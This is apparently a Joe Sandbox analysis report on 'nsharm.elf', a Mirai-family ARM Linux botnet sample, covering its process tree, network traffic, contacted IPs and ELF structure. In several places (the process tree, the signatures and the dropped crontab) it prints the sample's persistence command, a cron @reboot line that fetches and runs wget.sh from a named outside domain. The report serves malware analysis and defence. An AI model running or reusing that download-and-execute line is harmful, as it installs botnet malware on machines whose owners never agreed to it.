Edit tour

Linux Analysis Report
nsharm.elf

Overview

General Information

Sample name:	nsharm.elf
Analysis ID:	1542857
MD5:	87f114f7f6a5830d45ffe101ccd0de1c
SHA1:	1156d361e2050a882e4b224410682e116575588d
SHA256:	bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542857
Start date and time:	2024-10-26 19:16:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	nsharm.elf
Detection:	MAL
Classification:	mal60.troj.linELF@0/1@24/0

Warnings

VT rate limit hit for: nsharm.elf

Runtime Messages

Command:	/tmp/nsharm.elf
PID:	5453
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

nsharm.elf (PID: 5453, Parent: 5374, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nsharm.elf

nsharm.elf New Fork (PID: 5455, Parent: 5453)

sh (PID: 5455, Parent: 5453, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 5457, Parent: 5455)

sh New Fork (PID: 5459, Parent: 5457)

crontab (PID: 5459, Parent: 5457, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 5458, Parent: 5455)

crontab (PID: 5458, Parent: 5455, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

nsharm.elf New Fork (PID: 5460, Parent: 5453)

nsharm.elf New Fork (PID: 5504, Parent: 5460)

nsharm.elf New Fork (PID: 5461, Parent: 5453)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: nsharm.elf

ReversingLabs: Detection: 21%

Source: tmp.hvpvrW.18.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 31.13.248.89 ports 24818,4242,1,2,22281,4,8,10220
Source: global traffic	TCP traffic: 86.107.100.80 ports 21676,25455,2,4,5,12892

Source: global traffic	TCP traffic: 192.168.2.13:39080 -> 86.107.100.80:25455
Source: global traffic	TCP traffic: 192.168.2.13:54646 -> 31.13.248.89:24818
Source: global traffic	TCP traffic: 192.168.2.13:47922 -> 81.29.149.178:13812
Source: global traffic	TCP traffic: 192.168.2.13:46038 -> 213.182.204.57:21752
Source: global traffic	TCP traffic: 192.168.2.13:52898 -> 185.82.200.181:6271
Source: global traffic	TCP traffic: 192.168.2.13:37010 -> 193.233.193.45:2515
Source: global traffic	TCP traffic: 192.168.2.13:54720 -> 91.149.218.232:1414
Source: global traffic	TCP traffic: 192.168.2.13:45206 -> 91.149.238.18:23231

Source: /tmp/nsharm.elf (PID: 5453)

Socket: 127.0.0.1:1172

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknown	UDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknown	UDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknown	UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown	UDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknown	UDP traffic detected without corresponding DNS query: 70.34.254.19
Source: unknown	UDP traffic detected without corresponding DNS query: 64.176.6.48
Source: unknown	UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown	UDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknown	UDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknown	UDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknown	UDP traffic detected without corresponding DNS query: 217.160.70.42

Source: global traffic	DNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global traffic	DNS traffic detected: DNS query: daisy.ubuntu.com

Source: tmp.hvpvrW.18.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal60.troj.linELF@0/1@24/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 5459)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 5458)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 5458)	File: /var/spool/cron/crontabs/tmp.hvpvrW			Jump to behavior
Source: /usr/bin/crontab (PID: 5458)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/nsharm.elf (PID: 5455)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/nsharm.elf (PID: 5453)

Queries kernel information via 'uname':

Jump to behavior

Source: nsharm.elf, 5453.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5460.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/nsharm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm.elf
Source: nsharm.elf, 5453.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5460.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5504.1.000055dd178d3000.000055dd17a42000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: nsharm.elf, 5453.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5460.1.000055dd178d3000.000055dd17a42000.rw-.sdmp, nsharm.elf, 5504.1.000055dd178d3000.000055dd17a42000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: nsharm.elf, 5453.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5460.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp, nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: nsharm.elf, 5504.1.00007fffa64d4000.00007fffa64f5000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	Direct Volume Access	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nsharm.elf	21%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		unknown
kingstonwikkerink.dyn	195.133.92.51	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.hvpvrW.18.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.82.200.181	unknown	Netherlands	60117	HSAE	false
213.182.204.57	unknown	Latvia	9009	M247GB	false
193.233.193.45	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
91.149.218.232	unknown	Poland	198401	GECKONET-ASPL	false
31.13.248.89	unknown	Bulgaria	34224	NETERRA-ASBG	true
86.107.100.80	unknown	Romania	38995	AMG-ASRO	true
81.29.149.178	unknown	Switzerland	39616	COMUNICA_IT_SERVICESCH	false
91.149.238.18	unknown	Poland	41952	MARTON-ASPL	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
185.82.200.181	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Unknown	Browse
213.182.204.57	nsharm5.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Unknown	Browse
193.233.193.45	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse
91.149.218.232	nsharm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	ppc.elf	Get hash	malicious	Unknown	Browse
	x86.elf	Get hash	malicious	Unknown	Browse
31.13.248.89	gmpsl.elf	Get hash	malicious	Unknown	Browse
	nsharm5.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	gmpsl.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	nsharm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	harm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	sshd.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	nsharm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	harm4.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	.i.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	arm.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	c0r0n4x.arm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	c0r0n4x.x86.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
kingstonwikkerink.dyn	gmpsl.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	nsharm5.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	harm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	nshsh4.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	harm4.elf	Get hash	malicious	Unknown	Browse	31.13.248.89
	mips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	arm.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	hmips.elf	Get hash	malicious	Unknown	Browse	194.87.198.29
	arm7.elf	Get hash	malicious	Unknown	Browse	185.82.200.181

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	nsharm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	harm5.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	harm4.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	mips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	T52Z708x2p.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	lJ4EzPSKMj.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	Us051y7j25.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	91.202.233.141
	thcdVit1dX.exe	Get hash	malicious	Phorpiex	Browse	91.202.233.141
	botnet.spc.elf	Get hash	malicious	Mirai, Moobot	Browse	37.120.192.49
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	77.36.125.19
HSAE	harm5.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	nshsh4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	harm4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mips.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	mpsl.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	arm4.elf	Get hash	malicious	Unknown	Browse	185.82.200.181
	Copia r#U00e1pida del pago INV 00932024.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	SecuriteInfo.com.Heur.27949.8326.docx	Get hash	malicious	Unknown	Browse	185.82.202.150
	Proforma Invoice NOCAP PLASTIK AMBALA.exe	Get hash	malicious	AgentTesla	Browse	194.36.191.196
	ynwj.ps1	Get hash	malicious	Unknown	Browse	194.36.191.196
GECKONET-ASPL	nsharm5.elf	Get hash	malicious	Unknown	Browse	91.149.218.232
	nshsh4.elf	Get hash	malicious	Unknown	Browse	91.149.218.232
	harm4.elf	Get hash	malicious	Unknown	Browse	91.149.218.232
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	91.234.13.57
	ppc.elf	Get hash	malicious	Unknown	Browse	91.149.218.232
	x86.elf	Get hash	malicious	Unknown	Browse	91.149.218.232
	aWoyoSGAsv.elf	Get hash	malicious	Mirai	Browse	45.82.146.198
FREE-NET-ASFREEnetEU	harm5.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	nshsh4.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	harm4.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	mips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131
	hmips.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe	Get hash	malicious	Stealc, Vidar	Browse	147.45.44.221
	http://heks.egrowbrands.com/yuop/66e9b62daa62d_xin.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	http://hans.uniformeslaamistad.com/malesa/6705347f535f8_install.exe	Get hash	malicious	Unknown	Browse	147.45.44.104
	http://heks.egrowbrands.com/lopsa/67057a2256a25_SwiftKey.exe	Get hash	malicious	Unknown	Browse	147.45.44.104

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.hvpvrW

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.1650264720793055
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQzPXUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8zPMeHLUHYC+GABjnOGAFkz
MD5:	3A1477F76AC6B2438CFEF8D3361A05AC
SHA1:	45674226017D153B39765B70CD9B06427CA4520B
SHA-256:	DA0B25D2B2BD7A0E8AE1C523E784400BE070D86165EFC0A9BBABE248F69EDB94
SHA-512:	A80F69C3B7FE44150783064FC7FF96A62609DEDE377941039473C3C1474CCAB064E3A3715D9E84B8CADC22520DB1E681CE96FEF1B2AE8600D407C5370F2FFC1A
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:16:57 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy (8bit):	6.121362896226222
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	nsharm.elf
File size:	77'600 bytes
MD5:	87f114f7f6a5830d45ffe101ccd0de1c
SHA1:	1156d361e2050a882e4b224410682e116575588d
SHA256:	bfe1a5e25967f58cbb814b1c2cab0fc005d65100e6524a4cbc1858402c798d62
SHA512:	1cbf6c2276bd0431b4237f7543ae3ba3eb415df5a2de45558ff5a87d5af95752f2e5406661a210cb2d294de2a8322029d6631af851ea65b2b074fa7a91a95b3b
SSDEEP:	1536:WukDLaSfqMHzfdFM9IMksqL7dX4DgydyDXvW:WukSSfzHrrM9IPjID0W
TLSH:	EB733A45BC815A13C6D112BBFB6E428D772653A8E3EF3207DA256F21378B82B0E77541
File Content Preview:	.ELF...a..........(.........4....-......4. ...(......................)...)...............)...)...).......T..........Q.td..................................-...L."....C..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	ARM - ABI
ABI Version:	0
Entry Point Address:	0x8190
Flags:	0x202
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	77200
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8094	0x94	0x18	0x0	0x6	AX	4
.text	PROGBITS	0x80b0	0xb0	0x10f60	0x0	0x6	AX	16
.fini	PROGBITS	0x19010	0x11010	0x14	0x0	0x6	AX	4
.rodata	PROGBITS	0x19024	0x11024	0x1994	0x0	0x2	A	4
.ctors	PROGBITS	0x229bc	0x129bc	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x229c4	0x129c4	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x229d0	0x129d0	0x380	0x0	0x3	WA	4
.bss	NOBITS	0x22d50	0x12d50	0x510c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x12d50	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8000	0x8000	0x129b8	0x129b8	6.1506	0x5	R E	0x8000	.init .text .fini .rodata
LOAD	0x129bc	0x229bc	0x229bc	0x394	0x54a0	2.8538	0x6	RW	0x8000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 19:16:58.171935081 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:16:58.177295923 CEST	25455	39080	86.107.100.80	192.168.2.13
Oct 26, 2024 19:16:58.177376032 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:16:58.177541018 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:16:58.183047056 CEST	25455	39080	86.107.100.80	192.168.2.13
Oct 26, 2024 19:16:58.183089018 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:16:58.188431978 CEST	25455	39080	86.107.100.80	192.168.2.13
Oct 26, 2024 19:16:59.544830084 CEST	25455	39080	86.107.100.80	192.168.2.13
Oct 26, 2024 19:16:59.544948101 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:16:59.545145988 CEST	39080	25455	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:09.564397097 CEST	54646	24818	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:09.569816113 CEST	24818	54646	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:09.569907904 CEST	54646	24818	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:09.569907904 CEST	54646	24818	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:09.575333118 CEST	24818	54646	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:09.575392962 CEST	54646	24818	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:09.580841064 CEST	24818	54646	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:10.201116085 CEST	24818	54646	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:10.201366901 CEST	54646	24818	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:10.206878901 CEST	24818	54646	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:15.285408020 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:15.290852070 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:15.290993929 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:15.291018963 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:15.296432018 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:15.296493053 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:15.301907063 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:16.180845022 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:16.181066990 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:16.181066990 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:16.181410074 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:16.181494951 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:16.181593895 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:16.181639910 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:16.182012081 CEST	13812	47922	81.29.149.178	192.168.2.13
Oct 26, 2024 19:17:16.182075024 CEST	47922	13812	192.168.2.13	81.29.149.178
Oct 26, 2024 19:17:21.218502045 CEST	47844	22281	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:21.224009991 CEST	22281	47844	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:21.224142075 CEST	47844	22281	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:21.224142075 CEST	47844	22281	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:21.229496002 CEST	22281	47844	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:21.229568005 CEST	47844	22281	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:21.234941006 CEST	22281	47844	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:21.847544909 CEST	22281	47844	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:21.847734928 CEST	47844	22281	192.168.2.13	31.13.248.89
Oct 26, 2024 19:17:21.853209019 CEST	22281	47844	31.13.248.89	192.168.2.13
Oct 26, 2024 19:17:26.916112900 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:26.921591043 CEST	21752	46038	213.182.204.57	192.168.2.13
Oct 26, 2024 19:17:26.921700001 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:26.921770096 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:26.927191973 CEST	21752	46038	213.182.204.57	192.168.2.13
Oct 26, 2024 19:17:26.927257061 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:26.932672024 CEST	21752	46038	213.182.204.57	192.168.2.13
Oct 26, 2024 19:17:27.844522953 CEST	21752	46038	213.182.204.57	192.168.2.13
Oct 26, 2024 19:17:27.844795942 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:27.844904900 CEST	46038	21752	192.168.2.13	213.182.204.57
Oct 26, 2024 19:17:32.878983021 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:32.884519100 CEST	12892	43390	86.107.100.80	192.168.2.13
Oct 26, 2024 19:17:32.884610891 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:32.884654999 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:32.890270948 CEST	12892	43390	86.107.100.80	192.168.2.13
Oct 26, 2024 19:17:32.890352011 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:32.896447897 CEST	12892	43390	86.107.100.80	192.168.2.13
Oct 26, 2024 19:17:34.258059978 CEST	12892	43390	86.107.100.80	192.168.2.13
Oct 26, 2024 19:17:34.258193970 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:34.258330107 CEST	43390	12892	192.168.2.13	86.107.100.80
Oct 26, 2024 19:17:44.296891928 CEST	52898	6271	192.168.2.13	185.82.200.181
Oct 26, 2024 19:17:44.302409887 CEST	6271	52898	185.82.200.181	192.168.2.13
Oct 26, 2024 19:17:44.302490950 CEST	52898	6271	192.168.2.13	185.82.200.181
Oct 26, 2024 19:17:44.302539110 CEST	52898	6271	192.168.2.13	185.82.200.181
Oct 26, 2024 19:17:44.307914019 CEST	6271	52898	185.82.200.181	192.168.2.13
Oct 26, 2024 19:17:44.307966948 CEST	52898	6271	192.168.2.13	185.82.200.181
Oct 26, 2024 19:17:44.313513041 CEST	6271	52898	185.82.200.181	192.168.2.13
Oct 26, 2024 19:17:45.464508057 CEST	6271	52898	185.82.200.181	192.168.2.13
Oct 26, 2024 19:17:45.464705944 CEST	52898	6271	192.168.2.13	185.82.200.181
Oct 26, 2024 19:17:45.470046043 CEST	6271	52898	185.82.200.181	192.168.2.13
Oct 26, 2024 19:18:00.492732048 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:00.498145103 CEST	2515	37010	193.233.193.45	192.168.2.13
Oct 26, 2024 19:18:00.498281002 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:00.498322964 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:00.503760099 CEST	2515	37010	193.233.193.45	192.168.2.13
Oct 26, 2024 19:18:00.503868103 CEST	37010	2515	192.168.2.13	193.233.193.45
Oct 26, 2024 19:18:00.509229898 CEST	2515	37010	193.233.193.45	192.168.2.13
